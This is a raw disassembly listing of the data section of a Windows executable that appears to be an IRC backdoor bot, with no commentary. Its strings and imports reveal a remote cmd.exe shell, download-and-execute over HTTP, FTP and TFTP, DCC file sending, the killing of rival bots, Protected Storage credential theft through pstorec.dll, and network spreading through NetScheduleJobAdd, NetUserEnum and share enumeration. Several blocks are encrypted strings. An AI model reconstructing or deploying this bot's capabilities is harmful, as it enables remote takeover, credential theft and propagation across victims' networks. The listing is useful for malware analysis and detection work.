dword_4170E0 dd 77E75CEBh ; DATA XREF: sub_4098F3+A2�r
; sub_4098F3+1B6�r
dword_4170E4 dd 77E79908h ; DATA XREF: sub_409C36+2E�r
dword_4170E8 dd 77E80656h ; DATA XREF: sub_401244+D7�r
; sub_406643+19�r
dword_4170EC dd 77F7E21Fh ; DATA XREF: sub_409C6C+6�r
dword_4170F0 dd 77E79CE3h ; DATA XREF: sub_401981+118�r
dword_4170F4 dd 77E78C17h ; DATA XREF: sub_4167F1+31�r
dword_4170F8 dd 77E7C2C4h ; DATA XREF: sub_4167F1+A8�r
dword_4170FC dd 77E73167h ; DATA XREF: sub_414EF4+5AA�r
; sub_414EF4+5BC�r ...
dword_417100 dd 77E73BEFh ; DATA XREF: sub_414EF4+9C0�r
dword_417104 dd 77E7AC5Eh ; DATA XREF: sub_4148CE+B0�r
dword_417108 dd 77E76432h ; DATA XREF: sub_40D871+29B�r
; sub_414EF4+5CE�r ...
dword_41710C dd 77F7E300h ; DATA XREF: sub_409C7A+6�r
dd 0
dword_417114 dd 77C1C055h ; DATA XREF: sub_416F7A�r
dword_417118 dd 77C423F5h ; DATA XREF: sub_416F80�r
dword_41711C dd 77C219F5h ; DATA XREF: sub_416FA2�r
dword_417120 dd 77C20C5Bh ; DATA XREF: sub_416FA8�r
dword_417124 dd 77C21AD8h ; DATA XREF: .data:loc_416E08�r
dword_417128 dd 77C43150h ; DATA XREF: sub_416E02�r
dword_41712C dd 77C41FA0h ; DATA XREF: sub_416B3A�r
dword_417130 dd 77C33FDEh ; DATA XREF: sub_416DFC�r
dword_417134 dd 77C33FC1h ; DATA XREF: sub_416DF6�r
dword_417138 dd 77C3CE0Ch ; DATA XREF: sub_416DF0�r
dword_41713C dd 77C42D60h ; DATA XREF: sub_416DEA�r
dword_417140 dd 77C1C6F3h ; DATA XREF: sub_416DE4�r
dword_417144 dd 77C435C0h ; DATA XREF: sub_416DDE�r
dword_417148 dd 77C3E5D9h ; DATA XREF: sub_416DD8�r
dword_41714C dd 77C28925h ; DATA XREF: sub_416DD2�r
dword_417150 dd 77C28933h ; DATA XREF: sub_416DCC�r
dword_417154 dd 77C3CCE7h ; DATA XREF: sub_416DC6�r
dword_417158 dd 77C37FEDh ; DATA XREF: sub_416DC0�r
dword_41715C dd 77C33EB0h ; DATA XREF: sub_416DBA�r
dword_417160 dd 77C4B940h ; DATA XREF: sub_416CFE�r
dword_417164 dd 77C4B120h ; DATA XREF: sub_416CF8�r
dword_417168 dd 77C37ADCh ; DATA XREF: sub_416BFC�r
dword_41716C dd 77C2AC58h ; DATA XREF: sub_416BF6�r
dword_417170 dd 77C438C0h ; DATA XREF: sub_416BF0�r
dword_417174 dd 77C3C93Ch ; DATA XREF: sub_416BAE�r
dword_417178 dd 77C43AB0h ; DATA XREF: sub_416BA8�r
dword_41717C dd 77C3E8C0h ; DATA XREF: sub_416BA2�r
dword_417180 dd 77C1BE00h ; DATA XREF: sub_416B9C�r
dword_417184 dd 77C3E140h ; DATA XREF: sub_416B96�r
dword_417188 dd 77C3DFB5h ; DATA XREF: sub_416B90�r
dword_41718C dd 77C3BF06h ; DATA XREF: sub_416B88�r
dword_417190 dd 77C3D8F6h ; DATA XREF: sub_416B82�r
dword_417194 dd 77C3E4B9h ; DATA XREF: sub_416B7C�r
dword_417198 dd 77C3E303h ; DATA XREF: sub_416B76�r
dword_41719C dd 77C41FB0h ; DATA XREF: sub_416B70�r
dword_4171A0 dd 77C43490h ; DATA XREF: sub_416B6A�r
dword_4171A4 dd 77C46553h ; DATA XREF: sub_416B64�r
dword_4171A8 dd 77C3C813h ; DATA XREF: sub_416B5E�r
dword_4171AC dd 77C43900h ; DATA XREF: sub_416B58�r
dword_4171B0 dd 77C42E10h ; DATA XREF: sub_416B52�r
dword_4171B4 dd 77C2AA6Bh ; DATA XREF: sub_416B4C�r
dword_4171B8 dd 77C2AC46h ; DATA XREF: sub_416B46�r
dword_4171BC dd 77C43710h ; DATA XREF: sub_416B40�r
dword_4171C0 dd 77C421A2h ; DATA XREF: sub_416F74�r
align 8
dword_4171C8 dd 7713BC68h ; DATA XREF: sub_416E4E+44�r
align 10h
dword_4171D0 dd 77428B97h ; DATA XREF: sub_401D6E+2D�r
; sub_402A32+79B�r ...
align 8
dword_4171D8 dd 77D4456Bh ; DATA XREF: sub_40A9CF+121�r
dword_4171DC dd 77D79D1Ch ; DATA XREF: sub_414EF4+76D�r
dword_4171E0 dd 77D4C96Ah ; DATA XREF: sub_406D90+B0�r
; sub_408F2E+1D1�r ...
dword_4171E4 dd 77D5C13Ah ; DATA XREF: sub_40A9CF+128�r
; sub_415B60+84�r
dword_4171E8 dd 77D4BDCAh ; DATA XREF: sub_40D734+B�r
dword_4171EC dd 77D4702Fh ; DATA XREF: sub_40D74D+6C�r
; sub_40D74D+7E�r
dd 0
dword_4171F4 dd 71AB3E5Dh ; DATA XREF: sub_404FE7+C5�r
; sub_4050EA+106�r ...
dword_4171F8 dd 71AB1B7Bh ; DATA XREF: sub_416E30�r
dword_4171FC dd 71AB868Dh ; DATA XREF: sub_4048EF+11E�r
; sub_4048EF+39F�r
dword_417200 dd 71AB8629h ; DATA XREF: sub_40538D+8�r
; sub_412A3A+178�r ...
dword_417204 dd 71AB3F8Dh ; DATA XREF: sub_4046BC+114�r
; sub_4055E5+7B�r ...
dword_417208 dd 71AB3ECEh ; DATA XREF: sub_4046BC+129�r
; sub_411DC5+DF�r ...
dword_41720C dd 71AB1AF4h ; DATA XREF: sub_4053BF+F�r
; sub_40A9CF+1A74�r
dword_417210 dd 71ABF628h ; DATA XREF: sub_4044F7+21�r
; sub_4045B2+21�r
dword_417214 dd 71AB155Ah ; DATA XREF: sub_404457+1C�r
; sub_40447B+10�r
dword_417218 dd 71AB3C22h ; DATA XREF: sub_40432E+A�r
; sub_4046BC+CE�r ...
dword_41721C dd 71AB401Ch ; DATA XREF: sub_4038BA+72�r
; sub_40732D+1A8�r ...
dword_417220 dd 71ABD755h ; DATA XREF: sub_4038BA+D0�r
; sub_4038BA+171�r ...
dword_417224 dd 71AB1740h ; DATA XREF: sub_4038BA+E5�r
; sub_4038BA+186�r ...
dword_417228 dd 71ABD850h ; DATA XREF: sub_4038BA+28D�r
dword_41722C dd 71AB1890h ; DATA XREF: sub_4048EF+265�r
; sub_404E1C+E0�r ...
dword_417230 dd 71AB1A6Dh ; DATA XREF: sub_4053B1+6�r
; sub_40A9CF+1A80�r ...
dword_417234 dd 71AB350Dh ; DATA XREF: sub_403588+23�r
; sub_403588+4A�r ...
dword_417238 dd 71AB1746h ; DATA XREF: sub_403588+BA�r
; sub_403588+1FE�r ...
dword_41723C dd 71AB2BBFh ; DATA XREF: sub_403588+151�r
; sub_4055E5+F3�r ...
dword_417240 dd 71AB157Eh ; DATA XREF: sub_4020C2+B9�r
; sub_40449C+21�r ...
dword_417244 dd 71AB12F8h ; DATA XREF: sub_4020C2+1FA�r
; sub_4055E5+DD�r ...
dword_417248 dd 71AB5690h ; DATA XREF: sub_401E38+106�r
; sub_4053DC+27�r ...
dword_41724C dd 71AB12A7h ; DATA XREF: sub_401E38+141�r
; sub_4020C2+201�r
dword_417250 dd 71AB1ED3h ; DATA XREF: sub_4055E5+7F2�r
; sub_411DC5+372�r ...
dword_417254 dd 71AB1836h ; DATA XREF: sub_406E8E+2AB�r
; sub_407148+183�r ...
dword_417258 dd 71AB1444h ; DATA XREF: sub_411DC5+2A1�r
dword_41725C dd 71AB14DCh ; DATA XREF: sub_415F69+157�r
dword_417260 dd 71AB32CAh ; DATA XREF: sub_415F69+81�r
dword_417264 dd 71AB41DAh ; DATA XREF: sub_4167F1+201�r
dword_417268 dd 71AB5DE2h ; DATA XREF: sub_4046BC+14D�r
align 10h
flt_417270 dd 1.0e3 ; DATA XREF: sub_401E38+207�r
; sub_401E38+22F�r ...
flt_417274 dd 1.024e3 ; DATA XREF: sub_408B30+2A2�r
dword_417278 dd 0FFFFFFFFh, 409449h, 40945Fh, 0 ; DATA XREF: sub_4093B6+5�o
dword_417288 dd 0FFFFFFFFh, 409572h, 40958Ah, 0 ; DATA XREF: sub_4094E6+5�o
dword_417298 dd 0FFFFFFFFh, 416AE7h, 416AFDh, 0 ; DATA XREF: sub_4167F1+5�o
dd offset loc_416AC5
dd offset loc_416ADB
dd offset dword_4172F0
off_4172B4 dd offset sub_416F05 ; DATA XREF: sub_416ED3+12�o
; .data:00416F3A�o ...
dd offset dword_417338
off_4172BC dd offset sub_416F86 ; DATA XREF: .data:off_41DDB0�o
; .data:off_41DDD0�o
off_4172C0 dd offset off_41DDB0 ; DATA XREF: .data:004172D8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4172C0
dword_4172DC dd 3 dup(0) ; DATA XREF: .data:00417300�o
dd 1, 4172D8h
dword_4172F0 dd 3 dup(0) ; DATA XREF: .data:004172B0�o
dd offset off_41DDB0
dd offset dword_4172DC+4
align 8
off_417308 dd offset off_41DDD0 ; DATA XREF: .data:00417320�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_417308
dd 0
db 0 ; DATA XREF: .data:00417348�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 417320h
dword_417338 dd 3 dup(0) ; DATA XREF: .data:004172B8�o
dd offset off_41DDD0
dd offset unk_417328
align 10h
dword_417350 dd 19930520h, 4, 417370h, 5 dup(0) ; DATA XREF: .data:loc_416FDD�o
dd 0FFFFFFFFh, 416FB0h, 0
dd offset loc_416FBC
dd 1, 416FC5h, 2, 416FD1h, 0
dd offset off_41DDB0
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 416F21h, 0
dword_4173B0 dd 1, 417390h ; DATA XREF: .data:004173C4�o
dword_4173B8 dd 0 ; DATA XREF: sub_416EAF+19�o
dd offset sub_416F4E
dd 0
dd offset dword_4173B0
dd 1757Ch, 2 dup(0)
dd 17876h, 17114h, 1765Ch, 2 dup(0)
dd 1788Eh, 171F4h, 17498h, 2 dup(0)
dd 17C70h, 17030h, 17640h, 2 dup(0)
dd 17CE6h, 171D8h, 17468h, 2 dup(0)
dd 17DBAh, 17000h, 17638h, 2 dup(0)
dd 17DD8h, 171D0h, 17630h, 2 dup(0)
dd 17E3Eh, 171C8h, 0A1h dup(0)
dd 74730000h, 79706372h, 0
aStrlen db 'strlen',0
align 4
dd 616D0000h, 636F6C6Ch, 0
aFree db 'free',0
align 10h
aMemcpy db 'memcpy',0
align 4
dd 74730000h, 70636E72h, 79h, 69727073h, 66746Eh, 6C630000h
dd 6B636Fh, 656D0000h, 7465736Dh, 0
aStrcat db 'strcat',0
align 4
dd 74660000h, 6C6C65h, 77660000h, 65746972h, 0
aFclose db 'fclose',0
align 4
dd 6F660000h, 6E6570h, 72660000h, 646165h, 73660000h, 6B6565h
dd 74610000h, 696Fh, 73730000h, 666E6163h, 0
aStrstr db 'strstr',0
align 4
dd 735F0000h, 6972706Eh, 66746Eh, 74730000h, 6D636E72h
dd 70h, 6C616572h, 636F6Ch, 78650000h, 7469h, 665F0000h
dd 6C6F74h, 65630000h, 6C69h, 655F0000h, 70656378h, 61685F74h
dd 656C646Eh, 3372h, 625F0000h, 6E696765h, 65726874h, 78656461h
dd 0
aVsprintf db 'vsprintf',0
align 4
a??3@yaxpax@z db '??3@YAXPAX@Z',0
align 4
a??2@yapaxi@z db '??2@YAPAXI@Z',0
align 4
aPrintf db 'printf',0
align 4
dd 74730000h, 706D6372h, 0
aTolower db 'tolower',0
dd 656D0000h, 706D636Dh, 0
a_vsnprintf db '_vsnprintf',0
align 4
dd 725F0000h, 6C746Fh, 725F0000h, 72746Fh, 656D0000h, 766F6D6Dh
dd 65h, 78435F5Fh, 61724678h, 6148656Dh, 656C646Eh, 534D0072h
dd 54524356h, 6C6C642Eh, 0
aWsaioctl db 'WSAIoctl',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 4
aDeletefilea db 'DeleteFileA',0
dd 65530000h, 6C694674h, 74744165h, 75626972h, 41736574h
dd 0
aClosehandle db 'CloseHandle',0
dd 65540000h, 6E696D72h, 50657461h, 65636F72h, 7373h, 6C530000h
dd 706565h, 65520000h, 72506461h, 7365636Fh, 6D654D73h
dd 79726Fh, 704F0000h, 72506E65h, 7365636Fh, 73h, 4D746547h
dd 6C75646Fh, 6C694665h, 6D614E65h, 4165h, 65470000h, 646F4D74h
dd 48656C75h, 6C646E61h, 4165h, 65470000h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 64h, 64616552h, 656C6946h, 0
aGetexitcodepro db 'GetExitCodeProcess',0
align 4
dd 65500000h, 614E6B65h, 5064656Dh, 657069h, 72430000h
dd 65746165h, 636F7250h, 41737365h, 0
aDuplicatehandl db 'DuplicateHandle',0
dd 65470000h, 72754374h, 746E6572h, 636F7250h, 737365h
dd 72430000h, 65746165h, 65706950h, 0
aSearchpatha db 'SearchPathA',0
dd 72570000h, 46657469h, 656C69h, 65470000h, 73614C74h
dd 72724574h, 726Fh, 6F430000h, 69467970h, 41656Ch, 78450000h
dd 72507469h, 7365636Fh, 73h, 50746547h, 41636F72h, 65726464h
dd 7373h, 6F4C0000h, 694C6461h, 72617262h, 4179h, 65470000h
dd 73795374h, 446D6574h, 63657269h, 79726F74h, 41h, 46746553h
dd 54656C69h, 656D69h, 65470000h, 6C694674h, 6D695465h
dd 65h, 61657243h, 69466574h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 736C0000h, 656C7274h
dd 416Eh, 65530000h, 72754374h, 746E6572h, 65726944h, 726F7463h
dd 4179h, 65470000h, 636F4C74h, 49656C61h, 416F666Eh, 0
aGetversionexa db 'GetVersionExA',0
align 4
aGetcomputernam db 'GetComputerNameA',0
align 4
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
dd 65470000h, 73694474h, 6572466Bh, 61705365h, 78456563h
dd 41h, 44746547h, 65766972h, 65707954h, 41h, 54746547h
dd 436B6369h, 746E756Fh, 0
aQueryperforman db 'QueryPerformanceFrequency',0
align 4
aQueryperform_0 db 'QueryPerformanceCounter',0
dd 73490000h, 43646142h, 5065646Fh, 7274h, 65540000h, 6E696D72h
dd 54657461h, 61657268h, 64h, 74696E49h, 696C6169h, 7243657Ah
dd 63697469h, 65536C61h, 6F697463h, 6Eh, 65746E45h, 69724372h
dd 61636974h, 6365536Ch, 6E6F6974h, 0
aLeavecriticals db 'LeaveCriticalSection',0
align 4
aCreatethread db 'CreateThread',0
align 4
aUnmapviewoffil db 'UnmapViewOfFile',0
dd 614D0000h, 65695670h, 46664F77h, 656C69h, 72430000h
dd 65746165h, 656C6946h, 7070614Dh, 41676E69h, 0
aLstrcmpa db 'lstrcmpA',0
align 10h
aGetenvironment db 'GetEnvironmentVariableA',0
dd 736C0000h, 70637274h, 416E79h, 736C0000h, 70637274h
dd 4179h, 72430000h, 65746165h, 6574754Dh, 4178h, 65530000h
dd 72724574h, 6F4D726Fh, 6564h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 0
aWsprintfa db 'wsprintfA',0
align 4
aGetwindowtexta db 'GetWindowTextA',0
align 4
dd 65470000h, 726F4674h, 6F726765h, 57646E75h, 6F646E69h
dd 77h, 646E6946h, 646E6957h, 41776Fh, 65530000h, 654D646Eh
dd 67617373h, 4165h, 73490000h, 72616843h, 68706C41h, 6D754E61h
dd 63697265h, 53550041h, 32335245h, 6C6C642Eh, 0
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 6C654467h, 56657465h, 65756C61h, 41h, 45676552h
dd 566D756Eh, 65756C61h, 41h, 4F676552h, 4B6E6570h, 78457965h
dd 41h, 51676552h, 79726575h, 756C6156h, 41784565h, 0
aRegsetvalueexa db 'RegSetValueExA',0
align 4
dd 65520000h, 65724367h, 4B657461h, 78457965h, 41h, 55746547h
dd 4E726573h, 41656D61h, 0
aCryptreleaseco db 'CryptReleaseContext',0
dd 72430000h, 47747079h, 61526E65h, 6D6F646Eh, 0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
dd 68530000h, 456C6C65h, 75636578h, 416574h, 4C454853h
dd 2E32334Ch, 6C6C64h, 735F0000h, 6D637274h, 6970h, 695F0000h
dd 616F74h, 735F0000h, 696E7274h, 706D63h, 435F0000h, 68547878h
dd 45776F72h, 70656378h, 6E6F6974h, 0
a??1type_info@@ db '??1type_info@@UAE@XZ',0
align 4
aLocalfree db 'LocalFree',0
aOleaut32_dll_0 db 'OLEAUT32.dll',0
align 4
dd 6Dh dup(0)
off_418000 dd offset dword_418098 ; DATA XREF: sub_401000+1D�r
; sub_401000+2E�r
dd offset dword_41805C
dd offset dword_418040
dd offset dword_418014
dd 0
dword_418014 dd 0C5BCA58Ch, 0E1CEC1C6h, 0AB9AFEA0h, 0EF83EDA3h, 0FE9D88B1h
; DATA XREF: .data:0041800C�o
dd 0D6F7DFEFh, 0A087CF89h, 0ECAFEBB9h, 0F09CB083h, 2 dup(0)
dword_418040 dd 0E589938Ch, 0C7E0EDF4h, 0AD81C189h, 0EFB3F6BFh, 0DEB388B9h
; DATA XREF: .data:00418008�o
dd 0C9CFh, 0
dword_41805C dd 0E589938Ch, 0C7E0EDF4h, 0AD81C189h, 0EFB3F6BFh, 0C6B388B9h
; DATA XREF: .data:00418004�o
dd 0CDF6E2EAh, 8DB4FFA2h, 0E5B2EBB8h, 0F4B988B1h, 0CDFBFFF1h
dd 0BBBAD0BBh, 0F2A5CAA3h, 0F48C95A9h, 0F0h, 0
dword_418098 dd 0E589938Ch, 0C7E0EDF4h, 0AD81C189h, 0EFB3F6BFh, 0C6B388B9h
; DATA XREF: .data:off_418000�o
dd 0CDF6E2EAh, 8DB4FFA2h, 0E5B2EBB8h, 0F4B988B1h, 0CDFBFFF1h
dd 0BBBAD0BBh, 0A3h, 0
dword_4180CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: sub_401244+52D�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4180F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: sub_401244+50A�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41811C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: sub_401244+412�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_418144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: sub_401244+45�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_418174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4017AA+93�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4017AA:loc_401830�o
aListing db 'Listing',0 ; DATA XREF: sub_4017AA+7D�o
dword_4181A4 dd 303h ; DATA XREF: sub_4018AF:loc_401942�o
aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: sub_401981+2C9�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: sub_401981+27E�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_401981+48�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_401D6E+B9�o
align 4
asc_418214 db 0Dh,0Ah,0 ; DATA XREF: sub_401D6E:loc_401E0B�o
; sub_403DF3+18C�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_401D6E+7E�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401D6E+26�o
; sub_402A32+794�o ...
align 4
dword_418234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: sub_401E38+248�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_418280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: sub_401E38+CC�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4182AC dd 6277h ; DATA XREF: sub_401E38+36�o
; sub_402698:loc_40288E�o ...
dword_4182B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: sub_4020C2+3E1�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4182F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: sub_4020C2+313�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_418320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: sub_4020C2+28E�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_418348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: sub_4020C2+20F�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_4020C2+1D2�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4020C2:loc_40220F�o
; sub_406AE7+63�o ...
align 4
dword_41837C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_4024F3+101�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4183A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_40260D+72�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402698+155�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402698+104�o
align 4
asc_4183EC db 0Dh,0Ah ; DATA XREF: sub_402698:loc_402758�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402698+3A�o
; sub_4088FC+E9�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_418414 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: sub_402A32+7F6�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_418444 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: sub_402A32+7D1�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_41846C dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: sub_402A32+738�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
dword_4184B4 dd 7865202Ch, 74756365h, 676E69h ; DATA XREF: sub_402A32+6B0�o
dword_4184C0 dd 7075202Ch, 69746164h, 676Eh ; DATA XREF: sub_402A32+699�o
unk_4184CC db 2Dh ; - ; DATA XREF: sub_402A32+50E�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_4184F8: ; DATA XREF: sub_402A32:loc_402F16�o
unicode 0, </>,0
asc_4184FC: ; DATA XREF: sub_402A32+45F�o
; sub_414EF4+644�o ...
unicode 0, <:>,0
unk_418500 db 2Dh ; - ; DATA XREF: sub_402A32+3E4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 4
a69 db '69',0 ; DATA XREF: sub_402A32+3A8�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: sub_402A32+387�o
aAnonymous db 'anonymous',0 ; DATA XREF: sub_402A32+35A�o
; sub_402A32+36D�o
align 4
a21 db '21',0 ; DATA XREF: sub_402A32+328�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: sub_402A32+307�o
align 10h
a80 db '80',0 ; DATA XREF: sub_402A32+2CE�o
; sub_4043E9+27�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402A32+2AD�o
dword_41855C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: sub_402A32+135�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41858C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: sub_402A32+110�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
dword_4185C4 dd 656C6966h, 2F2F3Ah ; DATA XREF: sub_402A32+C0�o
dword_4185CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: sub_402A32+AA�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4185FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_403260+B2�o
dd 206F7420h, 2343003h, 2037325h, 0
dword_418620 dd 6578652Eh, 0 ; DATA XREF: sub_403260+43�o
; sub_412720+51�o
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: sub_40332B:loc_403538�o
; sub_40332B:loc_403545�o ...
align 4
aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: sub_40332B+200�o
; sub_40A9CF:loc_40BD52�o
align 4
dword_41864C dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_40332B+19C�o
aModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: sub_40332B:loc_40342A�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: sub_40332B+F3�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: sub_40332B:loc_40340C�o
align 4
aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: sub_40332B:loc_403403�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0
; DATA XREF: sub_40332B:loc_4033FA�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: sub_40332B:loc_4033F1�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: sub_40332B:loc_4033E8�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: sub_40332B:loc_4033DF�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: sub_40332B:loc_4033D6�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: sub_40332B+27�o
aUdp db 'udp',0 ; DATA XREF: sub_4038BA+27C�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_403BD3+20B�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_403BD3:loc_403DCA�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_403BD3+1E4�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_403BD3:loc_403DA3�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_403BD3+184�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_403BD3+171�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_403BD3+15E�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_403BD3:loc_403D23�o
align 10h
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_403BD3+13D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_403BD3+12A�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_403BD3+117�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_403BD3+104�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_403BD3:loc_403CC3�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_403BD3+DD�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_403BD3+CA�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_403BD3+B7�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_403BD3+A4�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_403BD3+91�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_403BD3+7E�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_403BD3+6B�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_403BD3+58�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_403BD3+45�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_403BD3:loc_403C00�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_403BD3+1A�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_403BD3+6�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_403DF3:loc_403F57�o
